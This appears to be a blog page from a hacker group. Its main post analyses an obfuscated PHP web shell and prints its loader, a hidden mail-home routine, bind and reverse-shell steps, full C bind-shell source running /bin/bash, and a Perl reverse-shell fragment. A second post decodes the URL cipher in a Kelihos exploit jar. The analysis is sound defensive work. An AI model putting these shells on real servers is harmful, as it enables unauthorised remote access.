AddThis Social Bookmark Button

l337 Reading


Chahid Inj3t0r Shell Code Analysis


User Rating: / 8

AddThis Social Bookmark Button

Chahid Inj3t0r Shell

In researching some of the personalities that were active in the recent #OpUSA, I came across an interesting shell used by one of the participants in other hacks that they had done.

The online handle of this hacker is Chahid Inj3ctor and he claims that it is his own.

For the sake of keeping this post reasonably short, I'm going to link to the text files that comprise the analysis. I've also included a .rar with the standard malware handler's password (if you don't know what that is, then email me).

- This code contains a backdoor which notifies a hardcoded email account our your configuration. Do not use this shell in an environment that hass access to the Internet and/or an email server.
- As will all obfuscated code, please be careful, I'm not responsible for anything that goes wrong. This thing was trivial to pull apart, but your mileage may vary.


The code seems to be a mangled version of a shell developed by Aditya Kesuma (, The original shell can be found here:

Aditya is Indonesian and there are variable names in Indonesian. Additionally there are multiple references to b374k. There is also an artifact from the orginal shell which sends an email to This artifact is not active as the SESSION variable 'notify' is not set.

The code for running shell commands is missing.

The C source code for tcp binding of an alternate commandline is corrupted.

The perl code for tcp binding of an alternate commandline is missing.

The code will still allow for a C language or perl based reverse bind shells.

Phase 1 - The Raw Code

The raw code starts out:

$Shell_Title = 'Shell by Chahid inj3ctor';
$Shell_Owner = '';;
$Root_Name = '00';
$Root_Pass = '00';
$Locked = true; // true For lock this shell -- False For Open This Shell

and then a variable that contains the obfuscated shell $code. All of this is contained in a single line. At the very end of the line we see the obligatory magic that turns the variable $code into working PHP code:

eval(base64_decode(gzuncompress(base64_decode($code)))); ?> </div> </body> </html>

What I usually do in these kinds of situations is (on a machine that is not connected to the Internet) simply change the eval statement into a print statement. This causes the code to expand and print (versus expand and execute...which is NOT a good thing ;) ).

After changing the eval statement, I simply execute:

php defanged.php > unobfuscated.php

The command places a copy of the base64_decoded, gzuncompressed, base64_decoded shell into the file unobfuscated.php.
(NOTE: the commands that are not in the encoded string are not included. If you want a complete shell you will need to preppend them to the code in unobfuscated.php)

The resulting "phase 2" as it were is looked at in the next section.

Logging In

Login checks the entered variable pword and uname against the variables $Root_Pass and $Root_Name. If they match the function sets session variables U_name and U_pass to track login status across refreshes. It encrypts the password entered using the MD5 algorithm so that if the session variable is intercepted it cannot be easily decrypted.

The flaw here is that, probably for ease of configuration, Root_Name and Root_Pass are not encoded with the rest of the shell (many other shells put the username and password within the encoded value to avoid a quick by pass). In the case of this captured shell code the Root_Name equals "00" and the Root_Pass equals "00".

if(isset($_GET['do']) == 'login') {
if ($_POST['uname'] == $Root_Name && $_POST['pword'] == $Root_Pass) {
$_SESSION['U_name'] = $_POST['uname'];
$_SESSION['U_pass'] = md5(md5(md5($_POST['pword'])));
$err = '-> Login Faild !<br />';

As long as the session variables U_name and U_pass match Root_Name and Root_Pass (encrypted using MD5 three times) then the user is allowed to continue. Additionally we see another way to gain access to the shell at this point. We can simply change the unencoded variable Locked to the value false. This will allow unpassword protected access to the shell.

if (isset($_SESSION['U_name']) and isset($_SESSION['U_pass']) or isset($Locked) and $Locked = false) {
if ($_SESSION['U_name'] == $Root_Name && $_SESSION['U_pass'] == md5(md5(md5($Root_Pass))) or isset($Locked) and $Locked = false) {
$is_login = true;
$is_login = false;
$is_login = false;

Please Mr. Postman

There is an interesting string which seems to have been purposely shoved far to the side using tabs that is meant to deceive the causual user. This string is:


Decoding this string shows an interesting piece of PHP code:

$site = $_SERVER["HTTP_HOST"];
$subject = "Shell Uploaded - $site";
$headers = "Content-type: text/html; charset=windows-1256\r\n";
$Pass_Md5 = md5(md5(md5($Root_Pass)));
$message = "<html>
<div align=\"left\" dir=\"ltr\">
<h4>This is information From : <a href=\"$link\">$site</a><br /></h4>
--------------------------------------------------<br />
Website : $site<br />
Shell Title : $Shell_Title<br />
Shell Owner : $Shell_Owner<br />
Shell : $link<br />
User : $Root_Name<br />
Pass : $Root_Pass<br />
Pass (Md5*3) : $Pass_Md5<br />
--------------------------------------------------<br />

The code gets the name of the host that the shell is running on (HTTP_HOST) as well as the URI for the admin panel(REQUEST_URI). It takes the $Root_Pass and encyrpts it three times using the MD5 hashing algorithm. It then loads the variable $message with a HTML formatted message with all of the data (including the thrice encrypted password).

The variable $message is not used in the code and so this seems to be a feature that has been either disabled by the person who put up this shell, or which was not completed by the original coder. The author has not downloaded a pristine copy of the b374k shell for comparison.

Normal Functions

Some of the normal functions in the shell include

magicboom - text
cleans text of quotes and slashes

showdir - pwd, prompt
builds a directory listing of pwd

ukuran - file
converts file size to human readable format
(NOTE: ukuran is Indonesian for size, giving an indication of the coder's nationality)

exe - cmd
executes a command on the server based upon the availability of various php system calls

tulis - file, text
performs a gzinflate on the base64 decoded value of text variable and writes it into file
(NOTE: tulis is Indonesian for write)

ambil - link, file
copies the contents of link into a new file specified by the variable file
(NOTE: ambil is Indonesian for take (or copy) )

which - pr
returns the correct path for pr using the system command which

download - cmd, url
using the specified mechanism in cmd to download the data specified in the url
(filename is the same as the basename of the url)

get_perms - file
create a string to display file permissions based on the permissions for file

clearspace - text
replaces " " with "_" throughout text

rapih - text
replace html breaks ( <br /> ) with ""
(NOTE: rapih is Indonesian for neat)

The Main Loop

There are some commands which are passed via GET variables that are handled at the front of the main loop. These are:

dl - download the the contents of a file from the server to the browser
dlgzip - compress a file and download it from the server to the browser
img - display an image from the server to the browser
view - display a directory listing

prompt is set to the effective username based upon the operating system, hinting that this system shell will run on a windows box (WAMP) as well as Linux (LAMP)

$bindport is set to "13123"
$bindport_pass is set to "b374k"
(another hint as to original attribution)

There is one check for a POST variable named 'rename' which handles file renaming.

Menu Items

The shell displays the following top level functions:


Each are explored in detail in the following section. The present working directory is passed via the GET variable y. The selected command is contained in the GET variable x.


This is a well implemented PHP based file explorer.


This code has been removed from the captured sample.


This section is activated by the the GET variable x being submitted as 'php'. Data is passed between screens using the POST variable cmd.

The php section displays a text input area and passes anything within that area to the PHP processor for processing. If there is no command specified the default command:

echo file_get_contents('/etc/passwd')

is displayed.


This section is activated by the GET variable x being submitted as 'mysql'.

The GET variables sqlhost, sqluser, sqlpass, and sqlport are passed in the clear between iterations. Additional GET variables db and table can also be passed when set.

Every time the page refreshes it attempts a connection to sqlhost on sqlport using sqluser and sqlpass.
(NOTE: This would imply that the receiving database must allow for connections from any host as long as sqluser and sqlpass are correct. This may be to the advantage of Incident Responders who are able to identify the clear text arguments to ascertain data exfiltrated from the compromised server).

If the GET variable db is set then the display shows the name of the database.

If the GET variable table is set then the display includes the name of the current table.

if the GET variable db is set and no GET variable table is specified and no GET variable sqlquery is set the code loads the GET variable sqlquery with the default set of commands:

CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );
LOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;
SELECT * FROM b374k_table;

This is another indicator of the orgination of the code.


This is a trivial mail sending routine which uses inherent PHP functions. Default settings display a sense of humor by the author.


Subject: patch me


Hey there, please patch me ASAP ;-p


This is a screen that displays all information about the PHP installation on the server


This is a simple file upload mechanism.


This section attempts to establish a non-HTTP based entry into the server. There are two fundamental connections supported. Bind (specified by the POST variable 'bind') and reverse bind (specified by the POST variable 'backconn'). Each of the connection types can be facilitated using either C language code (specified by the POST variable 'C') or Perl script (specified by the variable 'Perl').

Let's start with the 'bind' or direct TCP bind connection.

This option takes two POST variables besides the connection method and language. These are 'port' and 'bindpass'. When this option is selected with the 'C' language specified it first calls the already idnetified tulis routine with the arguments "bdc.c" and the encoded variable $port_bind_bd_c. As we saw before, tulis decodes the base64 string (in this case $port_bind_bd_c), gzinflates it, and writes the output to the file bdc.c (argument 1).

It then compiles the code using the command:

gcc -o bdc bdc.c

Changes the mode of the executable to read, write execute for all users (777) using the command:

chmod 777 bdc

Then it erases the source code file using:

unlink bdc.c

When all this is done it executes bdc in the background using the command:

./bdc port passwrd &

Having done all this it then checks to see that the process is running by searching for the string "./bdc $por(sic)" from the output of the process show command (ps), ps aux. Notice that there is a typo in the scan so this routine will not find the spawned process. However, if the process were found, the web page would return the value:

<p>Process found running, backdoor setup successfully.</p>

If the process is not found (which should always be the case because of the typo) the program will report:

<p>Process not found running, backdoor not setup successfully.</p>

The program follows the same compile, run and check routines for the reverse bind connection as well. Insted of using bdc, it uses the encoded data in $back_connect_c saving the data into bcc.c and compiling it into bcc. It then runs the executable using the command:

./bcc ip port &

The program does not check for existing processes running, nor the existence of an existing precompile executable. Instead of checking for a running executable it starts the executable and then gives the user the message:

Now script try connect to ".$ip." port ".$port." ..."

Now let's turn out attention to the Perl options. For the direct connection the encoded variable $port_bind_bd_pl is used. (NOTE: This code is not contained in the captured sample). The output is stored in the file bdp.

The permissions of this file are changed to executable for all using the command:

chmod 777 bdp

It then finds the name of the perl interpreter on the system using the command:


It then executes the perl script using the command:

$p2 bdp port & (where $p2 is the value reurned by the which function)

It too checks to make sure that the process is running, this time without the typo using the command:

ps aux

and grepping for the string

$p2 bdp port

The reverse bind perl connection uses the encoded variable $back_connect, saving the data into the file bcp.

After following the same steps, the program starts the process using the command:

$p2 bcp ip port &

It then sends the following message to the user:

Now script try connect to $ip port $port...

There is a final, and perhaps most interesting capability in this section referred to as 'expcompile'. This option seems to be meant to allow external compilation of an arbitrary program. The usefulness of this on a system that does not have gcc or perl installed is obvious.

If the POST variable excompile is set then three arguments are expected, wurl (a URI that contains the executable to be downloaded), wcmd (the command line associated with the program), and pilihan which is local filename of the data downloaded from wurl.

If pilihan is downloaded successfully from wurl it is executed (background execution is contingent on the construction of wcmd) and no message is displayed to the user.

If the file is not downloaded successfully a message is displayed:

error: file not found $namafile (where $namafile is the error message returned by the system).

Analyzing the Corrupted bdc Code

Searching for $port_bind_bd_c gives us a very similar decrypted C language file here:

The forum is dated Feb. 5, 2009. It seems as though the shell coder has simply

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(fork() == 0) {
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror("socket error");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
if (!chpass(argv[2],buf))
system("echo welcome to r57 shell && /bin/bash -i");
int chpass(char *base, char *entered) {
int i;
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
if (!strcmp(base,entered))
return 0;

Analyzing the Perl Reverse Connect Code

Running our modified tulis.php routine the variable $back_connect decodes as:

use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");

Searching the Internet for this code yielded a treasure trove of information, including live shells. A partial list of some of the more interesting links: (Feb 13, 2013) (2007)
xdh (at) bsdmail (dot) com (Feb 10, 2009) (March 31, 2011) (HEXB00T3R) (active shell) (Jan 29, 2013) (similar) (Feb 10, 2009) (Turkish 10/4/2010) (Russian 8/4/2007)

It seems that this is common backward connection code that has been used in a variety of shells including r57 and the Casper RFI Bot.

Decoding the Base64 Gzipped Variables in the Header

At the top of our unobfuscated.php we encounter 4 rather long strings that seem to be base64 encoded. These are:

93jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIh
ufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcw
tFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWj
vIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ
7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc
9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMl
daHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3B
NtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX
6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/
Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOEl
QTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bj
GB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";

$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1i
QGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIx
TnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWg
qe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9

l/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3
Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/n
iYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR
+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9j
L4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIf



Obfuscation at this point seems a little weak, as the names of the variables belie their purpose. Nevertheless, when we consider that a "skid" would not probably get this far, and would simply place the shell on a server, variable naming would not help a great deal.

You'll notice that there is something not quite right about our first file. This suggests that the base64 encoding was not done correctly and thus the code is not usable. We'll see what it was supposed to do in the next section.

Because the tcp bind code has been corrupted and the perl reverse bind code is absent only three of the five "netsploit" functions will work.

Written by DC 406 Webmaster Monday, 13 May 2013 20:55


Cracking the Kelihos String Substitution


AddThis Social Bookmark Button

So the guys at #Malwaremustdie scored the infection code for Kelihos.  Their analysis is here

(NOTE: AVG Linkscanner will eat the page because of the code on it)

While they were busy looking at PCAPS and stuff I started focusing on the 492.jar mentioned in the article and which is here:

The code is heavily obfuscated and this is just a quick analysis.

A great deal of the meat of the exploit is held back from the original jar.  Most of the classes are loaded once a connection is made to an obfuscated URL string which is passed to the code.  Which is the focus of this quick article.

The URL is obfuscated using a simple substitution cipher.  The unique bit, that makes the code quickly adaptable is that the actual URL is embedded in an innocuous parameter passed to the jar in the parameter "name".

In the sample that #Malwaremustdie captured the HTML code looked like this:

  1. <html><body> <b>Unexpected Error. Please, try again later.</b>
  2. <applet name="x-2-5-h" code="Co-de.class" archive="4-9-2.jar">
  3. <param name="name" value="/-g-g-c-2-9-9-x-8-u-g-j-g-8-n-h-i-n-0-5-?-x-9-t---0-/-g-x-s">
  4. </applet></body></html>

NOTE: lots of - have been inserted to keep your AV from having a fit ;)

The string in the param "name" is the obfuscated URL from whence additional bytecode is loaded and registered by the infector.

At the very end of the 492 jar is a class named Mizi with  a method named VObor that is passed a string variable iitusix.

A little backtracking showed that Mizi.VObor is called with Code.Anerl.  Code.Aneral is a string which is loaded with value of the param "name" using the getParmeter(Lajuv.Igogo).  Igogo is a constant "name" so the code is simply loading Anerl with the value getParameter("name").

From there the code is simple:

  1. public static String VObor(String iitusix)
  2.   {
  3.     String o = "qwertyuiopasdfghjklzxcvbnm0123456789.-=_/:?&";
  4.     String c = "qb8ug7yi?celz6_/1ns3.5o&hxm4:dftvwa-0jrk92p=";
  5.     String ifuss = "";
  6.     for (int i = 0; i < iitusix.length(); i++) {
  7.       ifuss = ifuss + o.charAt(c.indexOf(iitusix.charAt(i)));
  8.     }
  9.     return ifuss;
  10.   }

This is a simple cipher substitution that takes each letter in the "name" parameter, finds the index value in c (ciphertext) and then puts the corresponding index value in o (plaintext) into ifuss.

In the case of the string passed to the #Malwaremustdie captured jar we get:

hxxp:// (don't be confused...yes g=t but I don't want you to end up somewhere bad)

This makes sense as the original jar came from that same domain. 

There's a great deal of other stuff, as I said.  I don't have multiple samples so I can't guarantee that the cipher substitution is the same in each sample or if it changes with each different Redkit install.

Hope this helps.





Last Updated on Sunday, 21 April 2013 00:06 Written by DC 406 Webmaster Saturday, 20 April 2013 22:58


apt boredom


AddThis Social Bookmark Button

AddThis Social Bookmark Button

Mmmmmmm, one of my favorite dishes, Raspberry Pi.

Here is a nice article on how to use one to hook it up to a VPN for private secure web browsing.

Send us your favorite recipes!

Written by DC 406 Webmaster Wednesday, 23 January 2013 11:24


just like that


AddThis Social Bookmark Button

Written by Ed Williams Tuesday, 15 January 2013 14:10


ag3nt Security Fcrackzip Video


AddThis Social Bookmark Button

Nice little fcrackzip hint

Watch the video here

Upshot is "fcrackzip -b -v -m 2 -u" is much faster.

Well done video agent man! props!

Written by DC 406 Webmaster Tuesday, 11 December 2012 22:07


Page 1 of 96

<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>